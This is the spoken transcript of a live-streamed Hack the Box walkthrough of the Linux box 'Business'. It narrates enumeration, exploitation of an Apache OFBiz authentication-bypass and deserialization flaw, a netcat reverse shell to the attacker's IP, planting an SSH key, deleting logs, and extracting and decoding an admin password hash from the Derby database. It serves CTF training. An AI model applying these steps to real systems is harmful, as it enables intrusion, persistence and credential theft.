Hello, everybody. Welcome again to make me big. Welcome again to a streaming session of our Hack the Box meetup. There's too many people in the Discord, so we deviate to YouTube. Today, I will be showing you the box Business. Business is a active box, so after this presentation, it will immediately be made private until it is no longer a public box or an active box, I should say. It is a easy box, Linux based. I don't think I agree fully with the easy part of it, but we'll get to that in a little bit. We will see some basic enumeration, some web-based enumeration. We'll find some interesting application, and from there we'll utilize several CVEs to actually get access to the box. So the initial part will be relatively easy. So let's check it out. Let's grab my Kali. Here is my beautiful Kali. We have a business up and running. This is the enterprise lab that we have for at Novi that we use, but you can use it on Hack the Box itself as well. So everything's up and running. I already have owned everything. So beautiful. Let's close this beautiful window. If I still have the IP address. Yeah, I still have the IP address. That would be a very bad start, right? So let's first start with just doing some basic enumeration. We'll run nmap, and it should give us several ports that are available to run. Well, I hear a ping in my Discord. Yes, beautiful. So ports that we always see, port 2280 and 443. Generally, we don't see SSL per se. So let's do it like this. Give it a option to actually show some version information and to run the default scripts. These are generally safe scripts that you can run on anything. It will gather more information, some passive, some active. But it will show us some more detail about this box. For the very observant viewer, generally I immediately create a host name, which I do not do right now because I want to show something related to that. Nmap has completed. We don't need our IPsec tune for that. But we have the output, port 22, not very interesting. Port 80, it immediately tells us that it did not follow the redirect to the SSL version of business.htb. So if you would have not known the host name, now you know the host name, business.htb. And on SSL, it also says, hey, you should go to the host name itself. So let's see what happens if we fill in the IP address. We go to a beautiful website. I already have it. Oh, it is cached. Interesting. There we go. I removed it, but the browser is trying to help me. So it says it does not know business.htb, which, yeah, we already know because we did not add it yet. So first thing to do is add the host name to our machine. Let's grab the IP address. I probably have the wrong IP address here. There we go. This tool head is a tool that I wrote myself. You can grab it from my GitHub. It allows you to easily modify your host file. It's quite handy. So there's probably some good Samaritan that will post a link into the meetup text. So let's check if it works. Business.htb. It is all up and running. And if we now reload the web page, we get a beautiful website. Dime a dozen template website. If we look at it, there's not a lot of information on it. We can scroll through some beautiful stock photos. I love this camera here, like an old Canon D60, I think. It's very nice. Not much. If we click on the links above it, there's only sections in this machine. Not much to discover. We can go back to services. Whoosh. Our impact in numbers, totally not true. And we have a form for contact. Well, this form for contact is quite useless. I've not seen, if I remember right, not seen any Hack the Box machine onto which the actual contact form did a lot of good. So let's see what we can do with this machine. And let's make it a little bit interactive. I'll look at the chat. What do you think we should do at this point in order to get some more information about this machine? There's a small delay, of course, so let's give it a couple of seconds. It's always a guess as to how much delay there is. There's people typing now. Give it an Nmap scan, Nikto. Yeah, well, Maru has a very good point. We scanned the IP address, but we did not scan the hostname. So maybe the hostname itself will yield different results. So it's always a good idea to actually rerun the Nmap scan again. With that, Richard says, hey, let's apply GoBuster, Nikto. There is a framework, CTFL notices there's a framework. Nimblemy says, well, maybe you should use Burp. Yeah, there's a lot of different things to do indeed. So not much of a difference except for that it now does the redirection and it will actually tell us some basic information. We can run Nikto on it. It's always a good idea. It will take a little while. This machine, it does not really like brute forcing, sadly. And in the meantime, we have the entire collection of web content discovery tools. I'm waiting for somebody to say "fifth." That will be good. Derp is also very good. Run a scan in the background and then look with Burp manually. Yes. In this case, eventually we can just do it. Why not, right? We'll run Burp and we will take a look at what we can learn. Always the same pop-up. We can ignore it. It is very good. Sorry, I will not approve. Yeah, there we go. Next, start. There we go. We'll go to the proxy. We'll open the browser. So the proxy allows you to view the traffic that goes through the browser. We'll open a browser. It will open its own version already fully configured. So no need for manual certificates, which is a very good addition. So let's run it. We'll go to the history. Introducing BombDOS. Beautiful. Thank you. Let's go to settings, go to the user interface, go to display, font size 20. There we go. Nice. A message editor. We want to have a change font to 20 so everybody can read it. Beautiful. Nice. So if we look at it, there is a lot of interesting content. Yeah, Maru says we can do some search for hidden resource, stuff like that. Indeed. Let's see, we have some jQuery, we have isotope, owl, carousel, superfish. Nice. Waypoints, whoa, superfish, easing, bootstrap. Right. Interesting. Let's see if we can find something in the headers, the response headers, this part, if there's anything that jumps out. One thing that I personally immediately notice is this J session ID. This J session ID indicates the use of a certain technology. Generally, you will find it in a Tomcat or a something Tomcat based Wildfly. I don't know if Wildfly has the thing, but so I expect this to be a Java machine. So that is very good. CTFL also notices it. It's very good. But for the rest, it is very tame in the information that it actually leaks. So I would say that that is quite good. Um, One thing that we do note, we note that the server is in nginx and that the session ID is from a Java thing. So we probably have something that has a reverse proxy in front of it. So nginx serving the HTML data, and behind it there will be a Java server. So we already know that there's two components at least in this thing. So yeah, quite interesting. Not a lot of extra things in it, but yeah, that's about it for now. You'll notice that Nikto has a hard time, um, and that is due to some very interesting workings of this machine. We saw some other tools, things to find and discover web content. I like to use FerexBuster. FerexBuster is a very good tool to actually do some scanning. We can already say discard 404 500. I'll show you why. If I just run it in its most plain form, it will start complaining because the certificate is untrusted. It is an insecure certificate. It's self-signed. So we need to tell FerexBuster to just trust it. It's all fine. It's all good. So if we run it, let's make it a little bit more less verbose. I'll cut it off right here. You'll notice that there is a 404 coming in, and FerexBuster has an automatic filtering. So it notices it's a 404 and it will discard that type of content. Yeah, FerexBuster hates Tmux, I know. And apparently it's a 500 error as well, which is also quite interesting. So let's take a look at the error 500 that gets generated. And it will tell us immediately, like I said, Tomcat 9082 is the server that it's running on. From this one exception, we also know something very interesting as well. There's something called offbis, Apache offbis. I had never heard of this before. So I did what anybody would do, ask ChatGPT, but you can also Google it. Apache offbis is a suite of business applications flexible enough to be used across any industry. Kind of like, sounds like SAP. It is flexible enough to work everywhere. Just need to have some consultants to actually make it work. So interesting, Apache offbis. Never heard of it, but it shows up in the error messages. So that is already a very good thing to note. Let's have a proper look at the output of the run. There are a whole bunch of interesting URLs. As we now know that I will kill it here. We now know that this Apache offbis is meant for a like SAP-like ERP system. One thing I did while this was running, and it took a very long time to run, I actually went to the Apache offbis setup and I looked at if there's a guide or something. So there's a where is it? The setup guides, how to install. Is it the Open Wiki? There was a Apache offbis installation guide, something like that. Demo data, setting up guides for Apache Offbis. Very good. It shows us what is all involved in this work. In the meantime, my chat and my Felix Buster was running, and at one point uh, during this, not this guide, um, during this installation guide, it shows you a list of interesting URLs, which is quite interesting. Somebody requests a reset of the machine. Yeah, in the shared environment, it is people are hammering that reset button. That is quite interesting. Yeah. So, what happens when you run this Felix cluster a long time? I think that the memory settings of the Java environment behind it are not very uh, big. So it starts spewing out error 500s, and that gets like a nasty situation. So it slows down quite immensely. If you look at the installation guides and you follow it, you will notice that there is like a setup area that you can visit, which is called the control area. In this case, if you just hit it, normally it will give you an error message. Beautiful logo. It's made in Inkscape according to the sources. So that's quite interesting. Not some version information. So we know Tomcat 9082, but for Offbis we don't know it yet. But if you just scroll through the different control areas, you will end up. Which one is it? Thought this one was it. See if this one does it. But there is a login page that will show up. Let's see. Go to it manually. Maybe it was marketing. It's always the marketing people. Marketing control. At least one of these control areas will actually lead to this login page. Well, no, not yet now. But from here, we get a beautiful login screen, which is quite interesting. Wasn't there an admin page? I did not. I have not come across an admin page, which is quite interesting. It is one of the first in the actual list, so I don't think so, but we can check it out. That would be quite funny. That I totally missed that one. Now that actually gets redirected, so that's okay. One below AP control. Control. For me, it loads to a thing, but yeah, you just scroll around and you visit the URLs of these control areas, and you actually get a beautiful error message for this beautiful system. But this login page actually shows you something quite nice, especially here, all the way on the bottom. It tells us exactly which version it is. 18.12. I think that's the actual version. Click, view source. There we go. There's no more specific version. It's 18.12, and that's it. Apache Offbis 18.12. So let's have some crowdsourcing. Which CVEs are available for Apache Offbis 18.12? See what the chat comes up with. I still see the same IP. It didn't reset in my screen, also not after refreshing. Yassine, do you mean the IP address in Hack the Box? Or do you mean the IP address on the box itself? Content control login. Yeah, every control area has a login page indeed. Yeah, there we go. What you might notice is that all these CVEs are quite new. And as with all the hack the box machines, as soon as a CVE is used, you currently have like a gazillion scripts to exploit it. So that's quite nice. Uh, no, you see, no, it does not always reset. That's true. So there's actually two indeed. Ivan has it correct, and I believe one is due to another because they did not fix it properly. Yeah, Jeroen did also something that I did. If there is a system that is installed, maybe it has default credentials. Indeed, the admin and offbis. That did not work. Admin, flex admin. I did not try flex admin. Flex admin, demo admin also did not work. But you can try default credentials. It's always a very good thing to do. It is, of course, a easy box, so you might expect that. So there's a bunch of users that have created beautiful scripts. I tried a couple. Some are just meant to determine if a vulnerability is there or not. But let's first do what anybody could do is say Apache offbis CVE. And now we have the security page. See, and we have CVEs galore. This CVE, oh, please go away. CV 51467 permits attackers to circumvent authentication processes. Awesome, enabling them to remotely execute arbitrary code. Ah, if you can talk dirty in CVEs, this would be talking dirty in CVEs. Yeah, exactly what we want. We want to actually do something while we're not authenticated and just execute stuff. So one of the better, or I think better implementations of this CVE is by yeah Kabakos, indeed, the Apache offbis authentication bypass. It was done 2 weeks ago, so I'm thinking this person is part of the Hack the Box group. While Spotify pings me that they created a new playlist. Very good news. So Apache offbis authentication bypass. It says here this exploit script and POC are written for an in-depth CVE analysis at V Society. So shout out to them. Let's take a look. I already love their layout. It is beautiful. And Yakaba has indeed written various bypass descriptions. This is for the 49070, and there should also be one for the 51 something. So we notice that the CPU is busy because stuff animates on screen. So let's close that. So let's take a look what this thing can do. It is a versatile SonicWall threat team discovered this problem. So let's take a look at their discovery, which is from December 2023. So it is very recent. So that's very nice. It goes into some discussion. It actually goes into the details as to what is wrong. I will leave that for you to read for yourself. There's some test cases that they have done. Yeah, and let's see what we can do with it. This script is beautiful. It is a simple and very effective script. So that's what I love. So you just run it, you give it a URL, and if you want to run a command, you can tell it which command you want to run. So that's always good. Let's take a look at the thing itself. Always good to know what you run. Don't be me when you do dumb things. So yeah, invalid invite. Yeah, let's see. That's nice. Beautiful. Yeah, there is a there's a curl command that you can use, but actually to make it run stuff, you actually need to do more than that, I believe. But yeah, this is the basic problem, which is quite funny. So we also see it here, the required pass, what Renee has put in the chat itself. So it will scan to see if it is vulnerable. If it receives a pong, it seems to says it is vulnerable. Then it uses YSO serial, all.jar, to actually create a payload. So effectively, we have an insecure deserialization, or maybe, I don't know if it's insecure. It's a deserialization that occurs that allows us to run commands. So that is quite interesting. Let's see if we can figure out what it actually will run. There is a application XML that gets run, and then we need to have why so serial being called here somewhere. Why so serial? Yeah, there we go. So if we look at this command, the actual creation of the payload, we have a Java command which always takes a lot of arguments, especially the newer versions. We need to add in modules. So the runtime itself does not have all the modules. We need to add them in, which makes it a little bit more complex. Blah, blah, blah. We have done it all. And then why so serial is added, so it will use the why serial thingy, and then it will utilize actually a insecure deserialization in a commons bean utils1, and then whatever command we give, it will run. And this common beans utils1 is a no, it's part of the libraries that are part of the Java environment, and by giving it a serialized object to deserialize using these common bean utils, it will actually run code. Unintended, but quite useful. Let's see, there is, Chris already has it up and running. Very good, very good. So let's run this baby. There we go, we copy it. We'll make boxes, make their business live, because I already have my work done. That's the other one. Business live. And we'll do a git clone of this beautiful thing. Should have done that, but that's okay. Clone the repo. Yeah, you've seen we can just do a clone by pressing this beautiful green button and doing the copy. And with that, we clone the repository. So that is beautiful. We get the code to our machine, and it will actually give us a directory Apache Offbase authentication bypass. So let's see, there's code here. We need the exploit.py, and we need the YSO serial all.jar. Those things are necessary. I don't know this X detection, but so let's first try the exploit.py minus URL HTTP s for business.htb. Let's see if it's vulnerable, and running it, it will say, hey, this machine is vulnerable. So it actually works. So if we take a look at the description here, it says a command, and we can run the command. Well, we can do any command we want. We can have fun with this and say we have a Python 3 -m http.server. We can run a web server and then ask the remote to actually curl. We know it's a Linux machine. 10.10 14.3 port 8000. And we should actually see a HTTP request coming in. So that means we can run something. We have verified that the command runs and that the machine actually does something, which is quite nice. So yeah. Let's see, Yassine in the chat says, "Oh no, it says not found." Maybe you need to change the directory to the directory of um, the exploit itself. But this is obviously very cool that we can do a curl request. But what would be a better thing to do in order to get this machine to do something useful for us as hacker dudes and dudettes? I'll wait for the chat to actually see this message from the future. ESP and Leonard are typing, and their answer is curl semmod and then run it. Or, yeah, reverse shell. Yeah, I would go for reverse shell indeed. Interestingly, ESP says you should write a script, curl it from your machine, and run it. Yeah, you've seen downloaded the zip file, so you can do the git clone and it should work. Upload a nasty web shell, netcat indeed. Yeah, I would. There's a ton of possibilities here. We could curl something from our machine, put it in temp folder, make it executable, run it. We can upload a shell. We could do that through making a JSP maybe and putting it somewhere. There's actually simpler ways we could try to figure out or try out if netcat is available on the machine. And that's also what I did. I actually used something that I learned due to this meetup. I have a very special interactive reverse shell one-liner that Chris figured out one beautiful meetup. I don't know if it's which one it was, but it actually does this beautiful thing here. Basically, it fully upgrades our reverse shell, so it will make a fully interactive shell. Did I do that immediately? No, no. I will comment it out first and just run a netcat lnvp of 1234, and then we can ask our commands above to actually try just simple netcat 10 10 14 3 port 1234. This would be a very good way to see if it will actually work without knowing exactly which version of netcat it is. There's multiple versions with different arguments, which always makes the pain in the ass. So if we try this, we will actually find out that a shell connects back. It does not do anything. You cannot do anything here. We can kill it. We can restart. Let's kill and clean restart. And now we can try and figure out which netcat it is. So I did this one bin bash. May has a very good point. We have a popular area that we always use, refshells.com. There's something wrong with this screen. It has to be on the meme team. So now it's good. You can change your IP address here. You can set the port that you use, 1234. And now we can try stuff. There's all these beautiful areas. Netcat is available, and if you look at the screen, it says netcat. Use it like this, and it could work. There's a netcat -c version, and there's ncat and all these different areas. Yeah, it is a matter of trying stuff out. I immediately went for one of the netcat -e and -c. I think I tried -c first, then -e. If that does not work, we can try one of the others, and otherwise you can try and see if you can get any of the other commands to work. I think it's important. Can I send it in the chat? Jeroen, do you mean the fully interactive reverse shell one-liner? The beautiful thing? Let's see if you... Yasina asks, do I need to edit the export file? No, there's no editing necessary. Just run it. Just run it. It is all good. So I did this minus E bin bash. You can also do minus C. Try it first. There's the beautiful one-liner, the art piece of work. It is artwork. So if we run this, we'll notice that we get a connect back. And if we do ID, it will actually run the command. So this is beautiful, but as we know, this is a very limited shell. There's a couple of things we can do. The first one is obviously run the one-liner that we actually learned during the meetup. There we go. Yeah. Leonard says you should learn this one by heart. Yeah, no. Notes is better than anything, right? Um, uh, yeah, yeah. So if we run it, it says listening on the port, and if we then do the exploit.py and we run it, we will get something that looks like a shell. It gives us the information ID. Where are we? I will zoom into the shell. We can do host name. Where are we at? We already know which location we are. Who am I? Who am I? Offbis. So awesome. We actually gained a foothold to the machine. Uh, so And where did we end up? We ended up in some directory called offbiz. So it's probably the directory for the application framework, which is also quite logical because we actually asked the offbiz server to deserialize our attack. So we are in the context of that thing. So first thing to do, since it's hack the box, we go to the home directories and we look if there what the home directories are, offbiz and offbiz operator. So if we do groups, we are this user. So this is our home directory. If we do cd, we end up in this directory. Um, and we have user.txt. Yeah. And user.txt, we can count it. It should be 32 characters, 33 if you count the new line. You can copy it over. It's different for everybody. So, but we have our first flag, which is awesome. So we found a website. We did some content discovery. We figured out that it is an ng-ings, and behind that there is this offbiz server. This offbiz server is a Java-based server. By doing some content discovery, we found that it's an Apache offbiz, and we eventually found the version 18.12. If you did not find that version, if you look at the CVEs are so new that you could actually guess that they would be the ones that are running it. I don't know actually how old this machine is. Let's take a look at the opt offbiz. It is from October, December. It's quite interesting. So it seems that maybe this is not the intended route, but a CVE that came out afterwards. That could be very well the case, which would be quite funny that something is vulnerable to something else during. So we have user. We get a flag. Beautiful. So what do we do now? What do we do now? What do you think? Lin Peace. Yeah, the only correct answer in every discovery. Sudo minus L, it is an easy machine, so let's do sudo minus L first. It says enter the password. We don't have a password. I know Baga always says that every easy machine is generally solved by running sudo minus L or looking for a weird ass binary on the system. So, well, pspy, we see linpiece. Um, yeah, yeah, I must say I spent relatively a lot of time on what to do next. I think I have a linpiece here already. Business linpiece. Yeah. So, um, and we already have an interactive shell, but I was actually looking. It does not have a SSH directory, but I totally ignored that it does not have an SSH directory, and I made an SSH directory, and I tried to see if I can put my RSA key, SSH key into that. So echo this stuff into dot SSH/authorized keys. It should have stuff there now. Then it might be that your box was reset, and then you need to do it all over again. um, Yeah, Leonard has a good idea. Looking for passwords in the offbis folder. Yeah. So first, I did the SSH thing because I would love to have a fully interactive shell. That actually works. It's quite interesting as the user did not have its own SSH thingy already directory. So let's kill the one that we have. SSH is quite nice because then we can just do boxes, business live. We can just do a linpiece copy. And then we can chmod it plus x linpiece and run it. And I must say, this linpiece run is generally a rabbit hole, which is quite interesting. Look at contrap, suet flag. Indeed, that is what linpiece does for us. In a real life scenario, you generally cannot just run scripts on the machine, and you need to do some manual investigation. So it is good to know how these things are running. Um, let's see. It will take a little while. Let's see if there's any other suggestions. There was a pspy 64 in the temp when I did it. Yes, pspy is a beautiful tool. It allows you to see what is running, what processes get run every once in a while. So highly recommend. I ended up not using it, I must say. So let's see what it does. We have several users: data, offbis, and root. So we are already offbis. Data generally is a lower privileged user, so I think we don't need to explore that. So we want from offbis, we want to go to the root user. It will take a little while, but our idea of the entire machine was correct. There's an nginx that leads to a Java machine. So for the cunning viewers, you might have noticed, if you scroll all the way to the top, that when you run linpiece, yeah, Alex, we ran. It says red, yellow is 95% a privilege escalation factor. So as soon as this scroll by, this area caught my eye, and I'm all like, "Oh my god, that's it!" I know my colleagues that were trying this machine before me also had it, and we discussed quite a lot. Can we do anything with it? What it says is there is a writable executable. So there's something that is executable that is run through a service that could be executed, modified when it is executed. So there is a systemd service that is being used, um, that calls this Gradle W that we can modify. This actually turns out to be a rabbit hole, because if you look at the Offbiz service itself, it says it's for the Offbiz service. Bio, see you later. It sets some variables, but then it switches to the user Offbiz. And from there, Gradle W is run, which is terrible because the service runs as root, but it changes to Offbiz, which means that Gradle W, although we can modify it, it will only be run in the context of the user Offbiz. So by exploiting this, we get back to Offbiz and nothing else. So that was a very bad rabbit hole. And yeah, so I spent quite a lot of time digging through this output. What is interesting is that this Offbiz has something called Derby. And I myself am an old school Java programmer. Bagger is as well. And he would have said, like, oh, Derby, it's a database. Was triggered for me as well as, hey, there is a database on this machine. It is not a traditional MySQL database, not a Postgres database, but a Derby database. And if we look, do not laugh at the oldness of these pages. It is ancient technology, I would say. Look at this beautiful, beautiful page. It is still updated. Why they don't make a web page for it, I don't know. But there's still updates to it every once in a while. It is a database, an open source relational database implemented entirely in Java, which is cool. So one thing I thought is interesting. Let's see if we can figure out how to connect to this database. Because the rest of this output is just plain silly and not very useful. So I think I forget who said it. I think it was Leonard, I believe. He said, let's take a look at the Offbiz thing and see if we can find passwords and stuff like that. So I did what anybody would do, is I said, let's search for some passwords in this thing here. And we get a lot of nonsense as well, because this entire thing also has password functionality in the system. So it is horrible. Interestingly, let's see if I can find it. It is actually a SHA thingy. Let's see if I can find the configuration file. Yeah, there was a very interesting configuration file in the framework security config security properties framework security config, and then there's a security properties thing, which actually tells us that JMS is enabled, Java Messaging Service, and there, where is the sharding? Am I crazy? I'm in the wrong file, apparently. Let's try that again. The framework security config. There we go. That's security properties. Yeah, there is a some information that shows us that there is a SHA encryption used for the passwords. And SHA is not very big. It's better to do things like bcrypt and stuff like that. So it is. We should be able to crack just a SHA hash. If it is salted, it gets more difficult. it's not something that we can overcome, but it's not impossible. But we need some more information from it. So I spent a lot of time digging through these directories. One thing that I also searched was the Derby stuff. Derby, it also shows a lot of files, log files, which is quite interesting. There is in the runtime, there's log files that show lots of interesting, beautiful things that the server that is running is actually using Derby. Yeah, there we go. Password type is SHA. SHA. Indeed. It's important for later. We can also find some reference to SQL statements in the log files, which is quite interesting. And I don't think that I actually found a way to connect through these areas. What I did notice when you search for passwords, that it will hit the dot files of the Derby database. And the dot files are used as a data storage. And there's some very interesting things that we can do here. We can, of course, pull out some reverse engineering and then just dig through all the files and see if we find anything. But it is much more interesting to use a database for what it is used for, and that is to connect and query. But how do we do that? Well, this is where I spend, I guess, most of the time on this machine, figuring out how to connect to the Derby thing. The first time I did it, I just copied over all the runtime data Derby files, and I use tools like strings on it. We can take a look at the log file if there's anything interesting. First thing that is interesting in the log file is that it says that there is a jar file on this machine. It's actually in the .gradle directory that has all the code for this thing. So actually asked ChatGPT how to connect to a Derby database, and it told me to use a tool called Derby Tools IG, which is a tool that you can run, and then it connects to a database, and then from there you can do things like SQL queries. We see it here, execute SQL statements. So I must say I'm a big fan of artificial intelligence as we use it now, because we can just ask stupid questions and it will actually give useful answers. So I thought, as anybody probably would think, is if we take a look at this directory, it's the Derby Apache Derby directory thingy, and we go there. Let's see if we can do it like this. Remove all this stuff here. We will find this jar file, of course, and if we go a level up, we should find everything that is related to this thing. It has a POM file, which is like a bill of materials for this Derby jar. I thought maybe there's some more stuff here. Apache Derby, the Derby project. Oh, the Derby project. 10.14.2. It only has POM files, which is not very useful. You might wonder, why is that not useful, Arjen? Well, I will show you 9F. Oh, the other one, 7E. If we take the jar tool, JAR, and we do minus TVF, you could also use unzip because it's finally basically a zip file. Renee says you should. Most people copy the dot files. I think that's the cop out. I think there's an intended solution here, and I think copying the files is more of the quick and dirty solution. If we do this, it gives a lot of information. We already see that there's some Java SQL driver stuff here, and we do a grep for IJ, which is the name of the tool. It is not here, which is sad. because I would just want to connect to it. So given that I'm a Java developer from trade, I know there is a website called the mavenrepository.com, mvnrepository.com, and we can look for Derby. And Derby will give us an overview. It says this is the JDBC driver. The JDBC thing is used to connect to a database. This is the project itself, somewhat. Carbon, Derby, export packages, okay. A client JDBC, a database, Derby, and then Apache Derby tools. Contains Apache Derby tools like I, sysinfo, and dblock. Now, I thought, that's what I want. That's the thing that I need. So I clicked on it. There was a specific version. We saw version 10.14.2.0. So I went to 10.14.2.0 because that's what it says on the packaging. And then there's this hidden line that says the files located in this thing are here. It's called a jar file. So we can click on it. We can download it, complete it. So let's go to our machine, our own machine, because we downloaded it on our own machine. There is in the downloads, there is a Derby tools thingy now. So we copy it over to our box machine. I like to have all these things handy. That's very handy. And we can see if we can actually use this thing. Apparently, I don't have Java here. I have Java. I have no jar. No, I don't have jar. So I have a jar file on that machine above. So let's copy over this this file. And that's why it's handy to have a SSH session, because you can easily copy over stuff. So I put it in a home directory because I can. PVF, Derby tools, and we should see, it's right here, that it contains the IJ, the I tool, which should allow us to connect to the database, which is awesome. So good times. So how do we run this? Let's first, this indeed, Derby tools, grep IJ, class. Yeah, there we go. Why do I do this? Because I need to type it in. So there is Java available on this machine because it's a Java machine. Java, when you run it, you need to pass it something called a class path, minus CP. And the class path is basically the collection of jar files that you want to have as a base for this application to have availability to program parts. So let's start with the Derby tools, and we do org.apache.derby.tools.ij. I'm not making this up, but it's replacing the slashes with dots. We can also see this in the instructions of the tool itself, org apache derby tools ij. So let's do that. Let's see if it works. It actually works. Beautiful. And then it says connect, create a database. I just want to connect. There's here we go. Connect to a database. I'll zoom in a little bit. Yeah, the wonderful world of Java. Java, it has some very good things, and it has some very not so good things. So it has a connect, and then we can pass it a JDBC URL. There we go. I messed up again. So we do that, and we need to pass it a database. And database, in this case, is basically the file name, the location of the database, I should say. So we need to pass in the path. So we do this, and then we need to pass in the path. Now we need to figure out what the path was by scrolling to the location again, because I did not make any notes on this, because I'm a bad example, I should say. Always make notes. Full bar. So let's zoom out. Let's make this one session as well. So it was opt, off biz, runtime, data, Derby, I think. And in this Derby database, there are 3 databases. So there's the OLAP, which is basically a data warehouse type thing. There's a tenant, which would mean that there is this thing is used to host something else. And Offbase, I did not know where to start, so I just started at the top. So let's do Offbase pwd to get the location. Copy it, go back, paste it here, and use the connect. And let's see what happens. So apparently I did something wrong. What did I do wrong? Huh? Interesting. Probably I copied over a quote from a web browser, and that never works. JDBC, Ruby, paste. There we go. Hey, double quotes. What is it? Oh, semicolon. It is Java. Thank you very much. I should fail miserably. Let's try it again. Famous last words. It will work in one go, right? Semicolon. It says no suitable driver. Okay, so the tool itself does not know about connecting to Derby itself, but it needs a driver. Luckily, we know where to get a driver because we already found that thing. So we just need to grab that. Here we go. Let's grab this entire thing. There we go. Q. The class path, you can separate it with a colon. So we can paste our entire beautiful thingy here. We need to modify it a little bit so that it is actually the path and not something horrible that I created. Blah, blah, blah. And then it was in home of this. Nice. That's the full path to the Derby 10.14.2.0. So Derby tools and Derby itself, part of it, connect. I should be able to look at that up, right? This one. Back here. You tell it to connect there. And it says, fail to start a database with class blah blah. See the next exception. Another instance of Derby may have already booted the database. Ah, that's a bummer. So now, are we shit out of luck now? Is that what is happening? So I did what anybody would do. I actually went to look at what is in that directory. Runtime, data, Derby. First, I asked ChatGPT, and it said, shut down the other thing. I thought, well, that's not very useful. But one trick that we as programmers like to do is to actually have some file that indicates if there is a thing. Yeah, we have control over the service. I thought so as well, but if we do system ctl offbiz stop, stop offbiz, access denied. We need to be root to stop it, but it runs under our user. But then I thought, we have log files. What if the log files would suddenly disappear? So I made a move of star.log be gone, because yeah, that's smart to do. It's horrible for a system, but yeah, I wanted to know if it would actually work. So removing the log files actually meant that it worked. So that is very cool. Show the databases. Show tables. That works. Show tables. Actually went into the beautiful page of the Derby thingy to find out all the commands that you can run. There is a guide to do it, but it kind of resembles MySQL, which is quite nice. So we can just do queries, and it has a lot of tables. I will leave it on this screen and ask you which table should we actually take a look at. What do you think? Milo says, "Yeah, this is Java world indeed." I must say, people like to diss Java for their convoluted ways of doing things, but the entire ecosystem does work nicely together. The language is becoming better, but try to make a full-fledged web service in Rust, for instance, or in Golang. This getting started is much easier, but making something that is robust for an enterprise is quite hard. So yeah, uh, why can we connect to a database without a password? Well, that's a very interesting question, right? So there's no password on it. So as it is an in-memory thing, it uses the privileges of the system as being a guard against leaking data. So OM group or user login security group. Yeah, we have users login security group. Indeed. User login password history. Very good. Oh, very good. User preference. Yeah, sure. Yeah. All valid choices. Nimble Mice says user login. User login. That was also one of my first choices. Yeah, let's see. I will paste it into the chat. How about that? Uh, there we go. This one. 1, 2, 3. Do. Show. I hope I did it right. There we go. I did something right for once. Yeah. So this is the full command to run. And after we pwned the machine, we scoured the forums, but I did not find a lot of references to actually just querying the database. Everybody seems to just copy the files and run strings on it. So this is a more humane way, I would say. So that's quite interesting. Um, yeah, so a lot of tables. I eventually did select star from offbis dot user logins. Or select star from offbis dot user login. A horrible named scheme. And what we'll find out is that there is a field called current password, use login and current password. And for one user, there is some data in it. We can do it. Select user login, user password, or current horrible tool, current password from office.user login. User login ID, almost. Select user login ID, current password from office.user login. Nice. So we have a system user which has a null password, anonymous has a null password, and admin has this beautiful thing that we already noticed earlier, the SHA-based encryption. So I did what anybody would do: hash identifier, hash ID, throw it into Hashcat, have a lot of fun with it. I will actually copy it over to some notes here. I At first I thought this is a horrible rabbit hole because nothing actually worked. And based on this thing here, I also could not figure out how what this is supposed to be. It's not a SHA. It has things in it that does not work. Um, so eventually, as Offbiz is an open source project, I actually did the following. I did Offbiz GitHub, and then hash script. I think that the file is called. Yeah, it was a horrible search through the file structure itself, but I found the hash script Java file, and this Java file um, is quite interesting. It is so interesting that there are people on Hack the Box that have now created off-biz password hash cracker or something. Hash cracker. Uh, is this? Yeah, right there you go. Walkthroughs. Never do that. Boo. There's actually somebody who actually created a tool. I have it on this machine as well. There we go. Business. My original run through the Offbiz SHA-1 cracker. And this does not work until you do some black magic voodoo to the thing that you find. So I thought that was a little bit of a cop out. But this actually uses this source code as a base to create a tool that will crack passwords. And this thing is quite interesting. First thing here is that we'll notice if we scroll through that it will actually utilize base64 in some way, which is quite interesting. We see that there's different algorithms that can be used, and it will actually use that security.properties to find out what way it should actually encrypt stuff, which is quite interesting. I think there's multiple references. Properties. There's one reference to it, but it uses that file to see how it should encrypt stuff. And there's a SHA here. If nothing, then use SHA. Well, we already know SHA. If the salt is null, do something random. So, okay, we hope that the salt is not null, but that it is not random. And then it builds it. It says $, the hash type. That is also what we found. So $, then the hash type here. Then the salt. So this D apparently is the salt. Maybe it was also in the security properties and I overlooked it. And then it appends it. Appends that. We see that. And then it appends the get crypted bytes. So these are the crypted bytes, but these are not bytes. This is encoded stuff. So let's see if we can find out how it is encoded. Encode base64 URL safe string, which is interesting function. Base64, which comes from the Apache Commons codec binary base64. And this version of base64 does something very, very interesting. It kind of breaks I don't know if there's specification, but how you normally use base64 and how they do it, it is a little bit different. So after all this investigation and reading this code and scrolling through it, so we know that, yes, the thing that we make is well, Leonard makes a remark. It says, well, it's not even a URL. So I think that the only reason why you would actually make it a URL safe thing is that somewhere it is actually passed through a URL somewhere, maybe. Hopefully not. Anyway, so we know it is a SHA encoded thing, and we know we have the salt, which is very good because then we can do an attack on it using a word list. Now we just need to figure out how to actually get the original bytes that are in this weird base64 thing. Well, because this weird base64 thing is not something that Hashcat understands. It wants to have the hex string of the thing that you have encoded. So let's step here is to figure out how to convert this to the hex string of the original encrypted bytes. We can use our most powerful tool ever, CyberChef. CyberChef, CyberChef. Not go to the answer directly, CyberChef thingy. Yeah, you would think base64 minus d. Let's see what happens, right? Leonard makes a good point. Base64 minus d. Let's echo it into it. Invalid input. Then you could guess that there might be an equal sign padding missing, still invalid input. And I'm thinking that is due to these beautiful underscore and dash that are part of this setting. So CyberChef, we can do magic. Magic is a very good tool. Allows us to basically see what type of things CyberChef has that will work. It says maybe from base64, maybe base 85. Yeah. Well, this part took forever, but there it is actually base 64 because we know that from the source code. It is base 64. And base 64 has a character set of A through Z, 09 plus slash equals. And if we look at the sources, well, something is blowing up my CPU. A through Z, 0 through 9 dot slash, which is different than this. Eventually, and I need to do it in the correct way, I ended up with this one. Yeah, do the 2 hex, make it hex thing so we can actually read it. I think this is the correct one. Let's remove the spaces. None. Let's see. I think the other way around yields something that is slightly different. Yeah. That way around. I think this is the correct way. So it is a adjusted form from base 64. It removes the equals, the plus, and the slash because those are not safe for transfer over URLs. So we probably could have also found this information. Let's give it a try. URL safe, where are you? Base 64. I am now in the blame blame area. Base 64, something with oh, go away. Base 64. Encode base 64 URL string. Let's see if we can find it. It's part of yeah. Leonard has the right point. He says it is an easy box. I do not agree that this part is easy at all, unless there is a way that we are not doing, which is the intended way. But I don't think so. URL safe string encodes binary data using URL safe variant of the base64 algorithm, but does not chunk the output. The URL safe emits dash and slash instead of plus and slash. bash dash and underscore. So this is the thing that we would have to know and have to find out in order to 